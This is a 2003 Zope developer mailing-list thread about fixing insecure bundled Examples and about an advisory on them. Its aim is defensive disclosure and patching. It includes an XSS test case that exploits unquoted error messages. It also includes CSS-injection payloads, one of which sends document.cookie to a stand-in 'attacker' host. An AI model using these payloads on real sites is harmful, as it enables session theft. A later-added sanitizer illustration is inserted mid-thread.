Re: [Zope-dev] weak examples, weak exploits
On Mon, Jun 23, 2003 at 10:33:42AM -0400, Casey Duncan wrote:
> I would be in favor of making the Examples "opt-in" like the Zope
> tutorial. It seems silly to have it in every ZODB by default. Make people
> add it if they want it.

Moreover, the examples installed everywhere attract spam to [EMAIL PROTECTED]
(forwarded to [EMAIL PROTECTED]). I have seen numerous 'increase website
traffic' spams explicitly mentioning /Examples URLs around the net.

--
Martijn Pieters | Software Engineer  mailto:[EMAIL PROTECTED]
Zope Corporation http://www.zope.com/ | Creators of Zope http://www.zope.org/

___
Zope-Dev maillist - [EMAIL PROTECTED]
http://mail.zope.org/mailman/listinfo/zope-dev
** No cross posts or HTML encoding! **
(Related lists -
 http://mail.zope.org/mailman/listinfo/zope-announce
 http://mail.zope.org/mailman/listinfo/zope )
Re: [Zope-dev] weak examples, weak exploits
Jamie Heilman wrote:
> Then call it http://host/aww_shit_now_what=old+flava'

er, http://host/aww_shit_now_what?i=old+flava' rather.

--
Jamie Heilman http://audible.transient.net/~jamie/
"Paranoia is a disease unto itself, and may I add, the person standing
 next to you may not be who they appear to be, so take precaution."
                                                -Sathington Willoughby
Re: [Zope-dev] weak examples, weak exploits
seb bacon wrote:
> The file upload vulnerability was fixed in version 1.3 of Examples.zexp,
> though. The reason it's still turning up in 2.6.x versions is probably
> due to upgrades. Therefore I suppose additionally there should be a
> patch which examines the ZODB on startup and prints a warning if an old
> Examples folder is present.

I opted for a patch that simply removes all the magic auto-install crud
and goes for the installer link on the quick-start page. As for previous
zope installations, well, I don't feel like trying to figure out how to
examine the zodb and warn people if they've got bad examples still
installed; it strikes me as too much junk in the startup procedure, which
is already too slow as it is. I say chalk it up as a lesson learned and
move on.

As for my reworked examples, I added missing quoting to the navigation
examples, size limits and entry limits to the guest book, size limits and
entry limits to the file library, and additional sanity checking and
robustness to just about everything. Examining the original advisory,
this is how I break it down:

1) moot with the addition of SiteErrorLog
2) Examples/db no longer exists in the Examples; I'm unaware if it ever
   did, at any rate, not a problem
3) moot with the addition of SiteErrorLog
3a) this is a problem, see below
3b) fixed in my reworking
3c) I was unable to reproduce this, maybe a bug with older Zopes?
extra notes) wtf? I have no idea what the advisory author was trying to
   say by including that diff, and I have a feeling he doesn't know
   either. I mean, it has the words 'examples' and 'security' in it, but
   that doesn't make it relevant.

There is, unfortunately, a snag. One of the exploits (3a), as it turns
out, is actually a problem deeper down.

To isolate a test case make a script like:

  ## Script (Python) "aww_shit_now_what"
  ##bind container=container
  ##bind context=context
  ##bind namespace=
  ##bind script=script
  ##bind subpath=traverse_subpath
  ##parameters=i
  ##title=
  ##
  # A non-numeric value of i raises ValueError, whose message (containing
  # the raw input) ends up in error_msg on the standard error page.
  return int(i)

Then call it http://host/aww_shit_now_what=old+flava'

This can be disarmed by ensuring that in your standard_error_message you
quote the results of error_msg; however, this isn't the default, and it
will result in a lot of broken and ugly looking (albeit safer) error
pages. I haven't fully figured out exactly what's going on with that
whole thing yet. I have a feeling it's attributable to either
raise_standardErrorMessage's "smart" tag searching, or some other
auto-magical aspect of the error handling framework. (clues appreciated)
In the meantime I suggest quoting error_msg.

--
Jamie Heilman http://audible.transient.net/~jamie/
"...that's the metaphorical equivalent of flopping your wedding tackle
 into a lion's mouth and flicking his lovespuds with a wet towel, pure
 insanity..."                                                  -Rimmer
Re: [Zope-dev] weak examples, weak exploits
Casey Duncan wrote:
> I would be in favor of making the Examples "opt-in" like the Zope
> tutorial. It seems silly to have it in every ZODB by default. Make
> people add it if they want it.

I agree.

Casey Duncan wrote:
> Actually the add form could be linked from the Quick Start page to make it
> really stupid simple.

Totally. Patch and reworked Examples may be found at
http://collector.zope.org/Zope/956

--
Jamie Heilman http://audible.transient.net/~jamie/
"Paranoia is a disease unto itself, and may I add, the person standing
 next to you may not be who they appear to be, so take precaution."
                                                -Sathington Willoughby
Re: [Zope-dev] weak examples, weak exploits
Andy McKay wrote:
> Casey Duncan wrote:
> > I would be in favor of making the Examples "opt-in" like the Zope
> > tutorial. It seems silly to have it in every ZODB by default. Make
> > people add it if they want it.
>
> +1 a simple "How to add the examples to the ZODB" at the top of the help
> would be good. Mind you I really don't want the HelpSys in my ZODB either :)

Removing the help system could also appreciably boost startup time. I
can't remember the last time I used the help system, yet it creates a
ZCatalog for each Zope product. It would be beneficial to allow users to
disable it completely.

Shane
Re: [Zope-dev] weak examples, weak exploits
On Monday 23 June 2003 12:00 pm, Andy McKay wrote:
> Casey Duncan wrote:
> > I would be in favor of making the Examples "opt-in" like the Zope tutorial. It
> > seems silly to have it in every ZODB by default. Make people add it if they
> > want it.
>
> +1 a simple "How to add the examples to the ZODB" at the top of the help
> would be good. Mind you I really don't want the HelpSys in my ZODB either :)

Actually the add form could be linked from the Quick Start page to make it
really stupid simple.

-Casey
Re: [Zope-dev] weak examples, weak exploits
Casey Duncan wrote:
> I would be in favor of making the Examples "opt-in" like the Zope
> tutorial. It seems silly to have it in every ZODB by default. Make
> people add it if they want it.

+1 a simple "How to add the examples to the ZODB" at the top of the help
would be good. Mind you I really don't want the HelpSys in my ZODB either :)

--
Andy McKay http://www.agmweb.ca
Re: [Zope-dev] weak examples, weak exploits
On Mon, 23 Jun 2003 01:20:35 -0700
Jamie Heilman <[EMAIL PROTECTED]> wrote:

> http://exploitlabs.com/files/advisories/EXPL-A-2003-009-zope.txt
[snip]
> apps, and apart from 1 and 3 there are probably legitimate bugs there.

related issues:

CMFWiki, ZWiki, Plone and other products are also vulnerable to 3a, as
far as the site permits anonymous users or persons without good
references to write.

To cope with the matter, I stupidly put multiple string substitutions.

  t = re.sub(r'(?i)<([^d>]*iframe[^>]*)>', r'', t)
  t = re.sub(r'(?i)<([^d>]*iframe[^>]*)>', r'', t)
  t = re.sub(r'(?i)<([^d>]*iframe[^>]*)>', r'', t)

It would be appreciated if someone advised me of a more general and smart
way. I know that Zope's StructuredText itself does not handle such a
case, and that kind of implementation may be left to each developer. If
it had the ability to avoid them, it would be much better, I think.

Another example

The following sample may allow malicious.css to be imported from outside
of the site. Put #1 or #2 into a StructuredText page.

#1 http://attacker/malicious.css";>
#2 @import url('http://attacker/malicious.css');

# example of malicious.css http://attacker/malicious.css
body { left: expression(eval( 'document.location="http://attacker/"+document.cookie;')) }

For example, make a 'Document' in a CMFDefault site, and put #1 into the
reply form, DiscussionItem, against the original document, etc. It seems
CMFDefault is vulnerable to this attack.

Any general remedy for that kind of exploit?

--
Kazuya Fukamachi
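The general remedy both posts above are circling (Jamie's unquoted error_msg in 3a, and the repeated iframe-stripping substitutions here) is to stop pattern-matching bad markup and instead escape untrusted text outright, or, where user content must keep some markup, parse it and keep only a known-safe set of tags and attributes. This is an added illustration, not code from the thread or from Zope; it uses Python's standard html.parser, and the allow-list and the sample fragments are constructed assumptions.

```python
from html import escape
from html.parser import HTMLParser

# Allow-list (an assumption for this example): tags we keep, and the
# only attributes kept for each of them. Anything else is dropped.
ALLOWED = {"p": (), "br": (), "b": (), "i": (), "em": (), "strong": (),
           "ul": (), "ol": (), "li": (), "a": ("href",)}
# Elements whose whole content is discarded, not just the tag itself.
DROP_CONTENT = {"script", "style", "iframe", "object", "embed"}
# href values must start with one of these, so javascript:/data: are out.
SAFE_SCHEMES = ("http://", "https://", "/")


def escape_text(s):
    """Escape so a string such as error_msg renders as literal text only."""
    return escape(s, quote=True)


class AllowListSanitizer(HTMLParser):
    """Re-emits only allow-listed tags; the parser lowercases tag names,
    so <IFRAME> and <iframe> are handled identically without regex tricks."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.drop_depth = 0  # > 0 while inside a DROP_CONTENT element

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT:
            self.drop_depth += 1
            return
        if self.drop_depth or tag not in ALLOWED:
            return  # unknown tag removed; its text content still passes
        kept = []
        for name, value in attrs:
            if name in ALLOWED[tag] and value and value.lower().startswith(SAFE_SCHEMES):
                kept.append(' %s="%s"' % (name, escape_text(value)))
        self.out.append("<%s%s>" % (tag, "".join(kept)))

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT:
            self.drop_depth = max(0, self.drop_depth - 1)
        elif self.drop_depth == 0 and tag in ALLOWED and tag != "br":
            self.out.append("</%s>" % tag)

    def handle_data(self, data):
        if self.drop_depth == 0:
            self.out.append(escape_text(data))  # text is always escaped


def sanitize(fragment):
    """Return an allow-listed, escaped version of an untrusted HTML fragment."""
    parser = AllowListSanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out)
```

For the error page case, escape_text(error_msg) alone is the right call, since an error message never needs markup; sanitize() is for guest-book or discussion content that legitimately keeps a little formatting.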
Re: [Zope-dev] weak examples, weak exploits
I would be in favor of making the Examples "opt-in" like the Zope
tutorial. It seems silly to have it in every ZODB by default. Make people
add it if they want it.

-Casey

On Monday 23 June 2003 05:12 am, Jamie Heilman wrote:
> seb bacon wrote:
> > No. Just go ahead and make the changes. It would be instructive for
> > others reading the examples to add a comment or two explaining the
> > rationale behind the extra checking code.
>
> 'k I can do that
>
> > The file upload vulnerability was fixed in version 1.3 of Examples.zexp,
> > though. The reason it's still turning up in 2.6.x versions is probably
> > due to upgrades. Therefore I suppose additionally there should be a
> > patch which examines the ZODB on startup and prints a warning if an old
> > Examples folder is present.
>
> You know, ironically, I don't think this "advisory" even covers that hole.
> There's obvious DoS potential in the guest book and such, but that's
> easily limited without degrading the value of the example. Anyway,
> I'll scrape over the examples and see what I can clean up.
>
> --
> Jamie Heilman http://audible.transient.net/~jamie/
> "Most people wouldn't know music if it came up and bit them on the ass."
> -Frank Zappa
Re: [Zope-dev] weak examples, weak exploits
seb bacon wrote:
> No. Just go ahead and make the changes. It would be instructive for
> others reading the examples to add a comment or two explaining the
> rationale behind the extra checking code.

'k I can do that

> The file upload vulnerability was fixed in version 1.3 of Examples.zexp,
> though. The reason it's still turning up in 2.6.x versions is probably
> due to upgrades. Therefore I suppose additionally there should be a
> patch which examines the ZODB on startup and prints a warning if an old
> Examples folder is present.

You know, ironically, I don't think this "advisory" even covers that hole.
There's obvious DoS potential in the guest book and such, but that's
easily limited without degrading the value of the example. Anyway,
I'll scrape over the examples and see what I can clean up.

--
Jamie Heilman http://audible.transient.net/~jamie/
"Most people wouldn't know music if it came up and bit them on the ass."
                                                          -Frank Zappa
Re: [Zope-dev] weak examples, weak exploits
On Mon, 2003-06-23 at 09:20, Jamie Heilman wrote:
> I'll submit a fixed Examples.zexp but I need to know how it's normally
> prepared, ownership, etc. Is there anything special I should do?

No. Just go ahead and make the changes. It would be instructive for
others reading the examples to add a comment or two explaining the
rationale behind the extra checking code.

The file upload vulnerability was fixed in version 1.3 of Examples.zexp,
though. The reason it's still turning up in 2.6.x versions is probably
due to upgrades. Therefore I suppose additionally there should be a
patch which examines the ZODB on startup and prints a warning if an old
Examples folder is present.

seb
[Zope-dev] weak examples, weak exploits
http://exploitlabs.com/files/advisories/EXPL-A-2003-009-zope.txt

This hit the full-disclosure list the other day. Vulnerabilities 1 and 3
are moot and have been since the introduction of SiteErrorLog. Although
if the responsible parties had bothered digging a little deeper they'd
have found the BCI HTTP headers and likely thrown a fit. Anyway, if you
can wade your way past all the spelling errors you'll see the 0day
exploits are your typical abuse of badly coded web apps, and apart from
1 and 3 there are probably legitimate bugs there.

Your predictable response: They're just examples. Uninstall them. They
shouldn't be left on a production system.

Sure, you know that, I know that, my cat knows that. Joe Six Pack told
me he knew, but he didn't care. Which tends to be the consensus. But
that's no excuse to be shipping bad examples. They should be fixed; bad
examples are worse than no examples at all.

I'll submit a fixed Examples.zexp but I need to know how it's normally
prepared, ownership, etc. Is there anything special I should do?

--
Jamie Heilman http://audible.transient.net/~jamie/
"I was in love once -- a Sinclair ZX-81. People said, "No, Holly, she's
 not for you." She was cheap, she was stupid and she wouldn't load --
 well, not for me, anyway."                                     -Holly